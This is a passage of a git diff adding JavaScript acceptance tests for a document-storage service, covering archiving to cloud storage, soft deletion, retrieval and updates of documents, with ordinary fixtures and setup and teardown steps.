Date('2017-01-27T16:10:44.194Z'), + }, + }, + { + id: new ObjectId(), + op: { d: 'bar', p: 50 }, + metadata: { + user_id: new ObjectId(), + ts: new Date('2017-01-27T18:10:44.194Z'), + }, + }, + ], + comments: [ + { + id: new ObjectId(), + op: { c: 'comment', p: 284, t: new ObjectId() }, + metadata: { + user_id: new ObjectId(), + ts: new Date('2017-01-26T14:22:04.869Z'), + }, + }, + ], + }, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + return done() + }) + } + ) + }) + + it('should successully archive the docs', function (done) { + this.res.statusCode.should.equal(204) + return done() + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + const ranges = JSON.parse(JSON.stringify(this.doc.ranges)) // ObjectId -> String + s3Doc.ranges.should.deep.equal(ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + describe('a doc that is archived twice', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['abc', 'def', 'ghi'], + ranges: {}, + version: 2, + } + return DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.archiveAllDoc(this.project_id, (error, res) => { + this.res = res + if (error != null) { + throw error + } + this.res.statusCode.should.equal(204) + return DocstoreClient.archiveAllDoc( + this.project_id, + (error, res1) => { + this.res = res1 + if (error != null) { + throw error + } + this.res.statusCode.should.equal(204) + return done() + } + ) + }) + } + ) + }) + + it('should set inS3 and unset lines and ranges in each doc', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + expect(doc.lines).not.to.exist + expect(doc.ranges).not.to.exist + doc.inS3.should.equal(true) + return done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + return DocstoreClient.getS3Doc( + this.project_id, + this.doc._id, + (error, s3Doc) => { + if (error != null) { + throw error + } + s3Doc.lines.should.deep.equal(this.doc.lines) + s3Doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + return describe('after unarchiving from a request for the project', function () { + before(function (done) { + return DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + }) + + return it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + doc.ranges.should.deep.equal(this.doc.ranges) + expect(doc.inS3).not.to.exist + return done() + }) + }) + }) + }) + + return describe('a doc with the old schema (just an array of lines)', function () { + before(function (done) { + this.project_id = new ObjectId() + this.doc = { + _id: new ObjectId(), + lines: ['abc', 'def', 'ghi'], + ranges: {}, + version: 2, + } + uploadContent( + `${this.project_id}/${this.doc._id}`, + this.doc.lines, + error => { + expect(error).not.to.exist + db.docs.insertOne( + { + project_id: this.project_id, + _id: this.doc._id, + rev: this.doc.version, + inS3: true, + }, + error => { + if (error != null) { + throw error + } + DocstoreClient.getAllDocs( + this.project_id, + (error, res, fetchedDocs) => { + this.fetched_docs = fetchedDocs + if (error != null) { + throw error + } + return done() + } + ) + } + ) + } + ) + }) + + it('should restore the doc to mongo', function (done) { + return db.docs.findOne({ _id: this.doc._id }, (error, doc) => { + if (error != null) { + throw error + } + doc.lines.should.deep.equal(this.doc.lines) + expect(doc.inS3).not.to.exist + return done() + }) + }) + + return it('should return the doc', function (done) { + this.fetched_docs[0].lines.should.deep.equal(this.doc.lines) + return done() + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/DeletingDocsTests.js b/services/docstore/test/acceptance/js/DeletingDocsTests.js new file mode 100644 index 0000000..3959246 --- /dev/null +++ b/services/docstore/test/acceptance/js/DeletingDocsTests.js @@ -0,0 +1,511 @@ +const { db, ObjectId } = require('../../../app/js/mongodb') +const { expect } = require('chai') +const DocstoreApp = require('./helpers/DocstoreApp') +const Errors = require('../../../app/js/Errors') +const Settings = require('@overleaf/settings') +const { Storage } = require('@google-cloud/storage') + +const DocstoreClient = require('./helpers/DocstoreClient') + +function deleteTestSuite(deleteDoc) { + before(async function () { + // Create buckets needed by the archiving part of these tests + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = [] + DocstoreApp.ensureRunning(() => { + DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error) { + throw error + } + done() + } + ) + }) + }) + + it('should show as not deleted on /deleted', function (done) { + DocstoreClient.isDocDeleted( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + expect(res.statusCode).to.equal(200) + expect(body).to.have.property('deleted').to.equal(false) + done() + } + ) + }) + + describe('when the doc exists', function () { + beforeEach(function (done) { + deleteDoc(this.project_id, this.doc_id, (error, res, doc) => { + if (error) return done(error) + this.res = res + done() + }) + }) + + afterEach(function (done) { + db.docs.deleteOne({ _id: this.doc_id }, done) + }) + + it('should mark the doc as deleted on /deleted', function (done) { + DocstoreClient.isDocDeleted( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + expect(res.statusCode).to.equal(200) + expect(body).to.have.property('deleted').to.equal(true) + done() + } + ) + }) + + it('should insert a deleted doc into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + docs[0]._id.should.deep.equal(this.doc_id) + docs[0].lines.should.deep.equal(this.lines) + docs[0].deleted.should.equal(true) + done() + }) + }) + + it('should not export the doc to s3', function (done) { + setTimeout(() => { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, error => { + expect(error).to.be.instanceOf(Errors.NotFoundError) + done() + }) + }, 1000) + }) + }) + + describe('when archiveOnSoftDelete is enabled', function () { + let archiveOnSoftDelete + beforeEach('overwrite settings', function () { + archiveOnSoftDelete = Settings.docstore.archiveOnSoftDelete + Settings.docstore.archiveOnSoftDelete = true + }) + afterEach('restore settings', function () { + Settings.docstore.archiveOnSoftDelete = archiveOnSoftDelete + }) + + beforeEach('delete Doc', function (done) { + deleteDoc(this.project_id, this.doc_id, (error, res) => { + if (error) return done(error) + this.res = res + done() + }) + }) + + beforeEach(function waitForBackgroundFlush(done) { + setTimeout(done, 500) + }) + + afterEach(function cleanupDoc(done) { + db.docs.deleteOne({ _id: this.doc_id }, done) + }) + + it('should set the deleted flag in the doc', function (done) { + db.docs.findOne({ _id: this.doc_id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.deleted).to.equal(true) + done() + }) + }) + + it('should set inS3 and unset lines and ranges in the doc', function (done) { + db.docs.findOne({ _id: this.doc_id }, (error, doc) => { + if (error) { + return done(error) + } + expect(doc.lines).to.not.exist + expect(doc.ranges).to.not.exist + expect(doc.inS3).to.equal(true) + done() + }) + }) + + it('should set the doc in s3 correctly', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, (error, s3doc) => { + if (error) { + return done(error) + } + expect(s3doc.lines).to.deep.equal(this.lines) + expect(s3doc.ranges).to.deep.equal(this.ranges) + done() + }) + }) + }) + + describe('when the doc exists in another project', function () { + const otherProjectId = new ObjectId() + + it('should show as not existing on /deleted', function (done) { + DocstoreClient.isDocDeleted(otherProjectId, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + }) + }) + + it('should return a 404 when trying to delete', function (done) { + deleteDoc(otherProjectId, this.doc_id, (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + }) + }) + }) + + describe('when the doc does not exist', function () { + it('should show as not existing on /deleted', function (done) { + const missingDocId = new ObjectId() + DocstoreClient.isDocDeleted( + this.project_id, + missingDocId, + (error, res) => { + if (error) return done(error) + expect(res.statusCode).to.equal(404) + done() + } + ) + }) + + it('should return a 404', function (done) { + const missingDocId = new ObjectId() + deleteDoc(this.project_id, missingDocId, (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + done() + }) + }) + }) +} + +describe('Delete via PATCH', function () { + deleteTestSuite(DocstoreClient.deleteDoc) + + describe('when providing a custom doc name in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithName( + this.project_id, + this.doc_id, + 'wombat.tex', + done + ) + }) + + it('should insert the doc name into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + expect(docs[0].name).to.equal('wombat.tex') + done() + }) + }) + }) + + describe('when providing a custom deletedAt date in the delete request', function () { + beforeEach('record date and delay', function (done) { + this.deletedAt = new Date() + setTimeout(done, 5) + }) + + beforeEach('perform deletion with past date', function (done) { + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + this.deletedAt, + done + ) + }) + + it('should insert the date into the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((error, docs) => { + if (error) return done(error) + expect(docs[0].deletedAt.toISOString()).to.equal( + this.deletedAt.toISOString() + ) + done() + }) + }) + }) + + describe('when providing no doc name in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithName( + this.project_id, + this.doc_id, + '', + (error, res) => { + this.res = res + done(error) + } + ) + }) + + it('should reject the request', function () { + expect(this.res.statusCode).to.equal(400) + }) + }) + + describe('when providing no date in the delete request', function () { + beforeEach(function (done) { + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + '', + (error, res) => { + this.res = res + done(error) + } + ) + }) + + it('should reject the request', function () { + expect(this.res.statusCode).to.equal(400) + }) + }) + + describe('before deleting anything', function () { + it('should show nothing in deleted docs response', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + expect(deletedDocs).to.deep.equal([]) + done() + } + ) + }) + }) + + describe('when the doc gets a name on delete', function () { + beforeEach(function (done) { + this.deletedAt = new Date() + DocstoreClient.deleteDocWithDate( + this.project_id, + this.doc_id, + this.deletedAt, + done + ) + }) + + it('should show the doc in deleted docs response', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id.toString(), + name: 'main.tex', + deletedAt: this.deletedAt.toISOString(), + }, + ]) + done() + } + ) + }) + + describe('after deleting multiple docs', function () { + beforeEach('create doc2', function (done) { + this.doc_id2 = new ObjectId() + DocstoreClient.createDoc( + this.project_id, + this.doc_id2, + this.lines, + this.version, + this.ranges, + done + ) + }) + beforeEach('delete doc2', function (done) { + this.deletedAt2 = new Date() + DocstoreClient.deleteDocWithDateAndName( + this.project_id, + this.doc_id2, + this.deletedAt2, + 'two.tex', + done + ) + }) + beforeEach('create doc3', function (done) { + this.doc_id3 = new ObjectId() + DocstoreClient.createDoc( + this.project_id, + this.doc_id3, + this.lines, + this.version, + this.ranges, + done + ) + }) + beforeEach('delete doc3', function (done) { + this.deletedAt3 = new Date() + DocstoreClient.deleteDocWithDateAndName( + this.project_id, + this.doc_id3, + this.deletedAt3, + 'three.tex', + done + ) + }) + it('should show all the docs as deleted', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id3.toString(), + name: 'three.tex', + deletedAt: this.deletedAt3.toISOString(), + }, + { + _id: this.doc_id2.toString(), + name: 'two.tex', + deletedAt: this.deletedAt2.toISOString(), + }, + { + _id: this.doc_id.toString(), + name: 'main.tex', + deletedAt: this.deletedAt.toISOString(), + }, + ]) + done() + } + ) + }) + + describe('with one more than max_deleted_docs permits', function () { + let maxDeletedDocsBefore + beforeEach(function () { + maxDeletedDocsBefore = Settings.max_deleted_docs + Settings.max_deleted_docs = 2 + }) + afterEach(function () { + Settings.max_deleted_docs = maxDeletedDocsBefore + }) + + it('should omit the first deleted doc', function (done) { + DocstoreClient.getAllDeletedDocs( + this.project_id, + (error, deletedDocs) => { + if (error) return done(error) + + expect(deletedDocs).to.deep.equal([ + { + _id: this.doc_id3.toString(), + name: 'three.tex', + deletedAt: this.deletedAt3.toISOString(), + }, + { + _id: this.doc_id2.toString(), + name: 'two.tex', + deletedAt: this.deletedAt2.toISOString(), + }, + // dropped main.tex + ]) + done() + } + ) + }) + }) + }) + }) +}) + +describe("Destroying a project's documents", function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = [] + DocstoreApp.ensureRunning(() => { + DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error) { + throw error + } + done() + } + ) + }) + }) + + describe('when the doc exists', function () { + beforeEach(function (done) { + DocstoreClient.destroyAllDoc(this.project_id, done) + }) + + it('should remove the doc from the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((err, docs) => { + expect(err).not.to.exist + expect(docs).to.deep.equal([]) + done() + }) + }) + }) + + describe('when the doc is archived', function () { + beforeEach(function (done) { + DocstoreClient.archiveAllDoc(this.project_id, err => { + if (err) { + return done(err) + } + DocstoreClient.destroyAllDoc(this.project_id, done) + }) + }) + + it('should remove the doc from the docs collection', function (done) { + db.docs.find({ _id: this.doc_id }).toArray((err, docs) => { + expect(err).not.to.exist + expect(docs).to.deep.equal([]) + done() + }) + }) + + it('should remove the doc contents from s3', function (done) { + DocstoreClient.getS3Doc(this.project_id, this.doc_id, error => { + expect(error).to.be.instanceOf(Errors.NotFoundError) + done() + }) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingAllDocsTests.js b/services/docstore/test/acceptance/js/GettingAllDocsTests.js new file mode 100644 index 0000000..8fe5e7d --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingAllDocsTests.js @@ -0,0 +1,112 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const async = require('async') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Getting all docs', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.docs = [ + { + _id: new ObjectId(), + lines: ['one', 'two', 'three'], + ranges: { mock: 'one' }, + rev: 2, + }, + { + _id: new ObjectId(), + lines: ['aaa', 'bbb', 'ccc'], + ranges: { mock: 'two' }, + rev: 4, + }, + { + _id: new ObjectId(), + lines: ['111', '222', '333'], + ranges: { mock: 'three' }, + rev: 6, + }, + ] + this.deleted_doc = { + _id: new ObjectId(), + lines: ['deleted'], + ranges: { mock: 'four' }, + rev: 8, + } + const version = 42 + const jobs = Array.from(this.docs).map(doc => + (doc => { + return callback => { + return DocstoreClient.createDoc( + this.project_id, + doc._id, + doc.lines, + version, + doc.ranges, + callback + ) + } + })(doc) + ) + jobs.push(cb => { + return DocstoreClient.createDoc( + this.project_id, + this.deleted_doc._id, + this.deleted_doc.lines, + version, + this.deleted_doc.ranges, + err => { + if (err) return done(err) + return DocstoreClient.deleteDoc( + this.project_id, + this.deleted_doc._id, + cb + ) + } + ) + }) + jobs.unshift(cb => DocstoreApp.ensureRunning(cb)) + return async.series(jobs, done) + }) + + it('getAllDocs should return all the (non-deleted) docs', function (done) { + return DocstoreClient.getAllDocs(this.project_id, (error, res, docs) => { + if (error != null) { + throw error + } + docs.length.should.equal(this.docs.length) + for (let i = 0; i < docs.length; i++) { + const doc = docs[i] + doc.lines.should.deep.equal(this.docs[i].lines) + } + return done() + }) + }) + + return it('getAllRanges should return all the (non-deleted) doc ranges', function (done) { + return DocstoreClient.getAllRanges(this.project_id, (error, res, docs) => { + if (error != null) { + throw error + } + docs.length.should.equal(this.docs.length) + for (let i = 0; i < docs.length; i++) { + const doc = docs[i] + doc.ranges.should.deep.equal(this.docs[i].ranges) + } + return done() + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js b/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js new file mode 100644 index 0000000..8448f26 --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingDocsFromArchiveTest.js @@ -0,0 +1,139 @@ +const Settings = require('@overleaf/settings') +const { ObjectId } = require('../../../app/js/mongodb') +const DocstoreApp = require('./helpers/DocstoreApp') +const DocstoreClient = require('./helpers/DocstoreClient') +const { Storage } = require('@google-cloud/storage') + +describe('Getting A Doc from Archive', function () { + before(function (done) { + return DocstoreApp.ensureRunning(done) + }) + + before(async function () { + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.createBucket(Settings.docstore.bucket) + await storage.createBucket(`${Settings.docstore.bucket}-deleted`) + }) + + after(async function () { + // Tear down the buckets created above + const storage = new Storage(Settings.docstore.gcs.endpoint) + await storage.bucket(Settings.docstore.bucket).deleteFiles() + await storage.bucket(Settings.docstore.bucket).delete() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).deleteFiles() + await storage.bucket(`${Settings.docstore.bucket}-deleted`).delete() + }) + + describe('for an archived doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + error => { + if (error) { + return done(error) + } + DocstoreClient.archiveDoc( + this.project_id, + this.doc._id, + (error, res) => { + this.res = res + if (error) { + return done(error) + } + done() + } + ) + } + ) + }) + + it('should successully archive the doc', function (done) { + this.res.statusCode.should.equal(204) + done() + }) + + it('should return the doc lines and version from persistent storage', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('archived') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + it('should return the doc lines and version from persistent storage on subsequent requests', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('archived') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + + describe('for an non-archived doc', function () { + before(function (done) { + this.project_id = new ObjectId() + this.timeout(1000 * 30) + this.doc = { + _id: new ObjectId(), + lines: ['foo', 'bar'], + ranges: {}, + version: 2, + } + DocstoreClient.createDoc( + this.project_id, + this.doc._id, + this.doc.lines, + this.doc.version, + this.doc.ranges, + done + ) + }) + + it('should return the doc lines and version from mongo', function (done) { + return DocstoreClient.peekDoc( + this.project_id, + this.doc._id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(200) + res.headers['x-doc-status'].should.equal('active') + doc.lines.should.deep.equal(this.doc.lines) + doc.version.should.equal(this.doc.version) + doc.ranges.should.deep.equal(this.doc.ranges) + return done() + } + ) + }) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/GettingDocsTests.js b/services/docstore/test/acceptance/js/GettingDocsTests.js new file mode 100644 index 0000000..121b3c1 --- /dev/null +++ b/services/docstore/test/acceptance/js/GettingDocsTests.js @@ -0,0 +1,137 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Getting a doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.lines = ['original', 'lines'] + this.version = 42 + this.ranges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + return DocstoreApp.ensureRunning(() => { + return DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + describe('when the doc exists', function () { + return it('should get the doc lines and version', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.ranges) + return done() + } + ) + }) + }) + + describe('when the doc does not exist', function () { + return it('should return a 404', function (done) { + const missingDocId = new ObjectId() + return DocstoreClient.getDoc( + this.project_id, + missingDocId, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + return done() + } + ) + }) + }) + + return describe('when the doc is a deleted doc', function () { + beforeEach(function (done) { + this.deleted_doc_id = new ObjectId() + return DocstoreClient.createDoc( + this.project_id, + this.deleted_doc_id, + this.lines, + this.version, + this.ranges, + error => { + if (error != null) { + throw error + } + return DocstoreClient.deleteDoc( + this.project_id, + this.deleted_doc_id, + done + ) + } + ) + }) + + it('should return the doc', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.deleted_doc_id, + { include_deleted: true }, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.lines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.ranges) + doc.deleted.should.equal(true) + return done() + } + ) + }) + + return it('should return a 404 when the query string is not set', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.deleted_doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(404) + return done() + } + ) + }) + }) +}) diff --git a/services/docstore/test/acceptance/js/UpdatingDocsTests.js b/services/docstore/test/acceptance/js/UpdatingDocsTests.js new file mode 100644 index 0000000..8793341 --- /dev/null +++ b/services/docstore/test/acceptance/js/UpdatingDocsTests.js @@ -0,0 +1,557 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { ObjectId } = require('mongodb-legacy') +const DocstoreApp = require('./helpers/DocstoreApp') + +const DocstoreClient = require('./helpers/DocstoreClient') + +describe('Applying updates to a doc', function () { + beforeEach(function (done) { + this.project_id = new ObjectId() + this.doc_id = new ObjectId() + this.originalLines = ['original', 'lines'] + this.newLines = ['new', 'lines'] + this.originalRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'foo', p: 3 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.newRanges = { + changes: [ + { + id: new ObjectId().toString(), + op: { i: 'bar', p: 6 }, + meta: { + user_id: new ObjectId().toString(), + ts: new Date().toString(), + }, + }, + ], + } + this.version = 42 + return DocstoreApp.ensureRunning(() => { + return DocstoreClient.createDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.originalRanges, + error => { + if (error != null) { + throw error + } + return done() + } + ) + }) + }) + + describe('when nothing has been updated', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = false', function () { + return this.body.modified.should.equal(false) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the lines have changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.newLines, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return this.body.rev.should.equal(2) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.newLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the version has changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version + 1, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return this.body.rev.should.equal(1) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version + 1) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when the version was decremented', function () { + beforeEach(function (done) { + DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.newLines, + this.version - 1, + this.newRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + done() + } + ) + }) + + it('should return 409', function () { + this.res.statusCode.should.equal(409) + }) + + it('should not update the doc in the API', function (done) { + DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.originalRanges) + done() + } + ) + }) + }) + + describe('when the ranges have changed', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + this.originalLines, + this.version, + this.newRanges, + (error, res, body) => { + if (error) return done(error) + this.body = body + return done() + } + ) + }) + + it('should return modified = true', function () { + return this.body.modified.should.equal(true) + }) + + it('should return the rev', function () { + return this.body.rev.should.equal(2) + }) + + return it('should update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(this.version) + doc.ranges.should.deep.equal(this.newRanges) + return done() + } + ) + }) + }) + + describe('when the doc does not exist', function () { + beforeEach(function (done) { + this.missing_doc_id = new ObjectId() + return DocstoreClient.updateDoc( + this.project_id, + this.missing_doc_id, + this.originalLines, + 0, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should create the doc', function () { + return this.body.rev.should.equal(1) + }) + + return it('should be retreivable', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.missing_doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + doc.version.should.equal(0) + doc.ranges.should.deep.equal(this.originalRanges) + return done() + } + ) + }) + }) + + describe('when malformed doc lines are provided', function () { + describe('when the lines are not an array', function () { + beforeEach(function (done) { + return DocstoreClient.updateDoc( + this.project_id, + this.doc_id, + { foo: 'bar' }, + this.version, + this.originalRanges, + (error, res, body) => { + if (error) return done(error) + this.res = res + this.body = body + return done() + } + ) + }) + + it('should return 400', function () { + return this.res.statusCode.should.equal(400) + }) + + return it('should not update the doc in the API', function (done) { + return DocstoreClient.getDoc( + this.project_id, + this.doc_id, + {}, + (error, res, doc) => { + if (error) return done(error) + doc.lines.should.deep.equal(this.originalLines) + return done() + } + ) + }) + }) + + return describe('when the lines are not present', function () { + beforeEach(function (done) 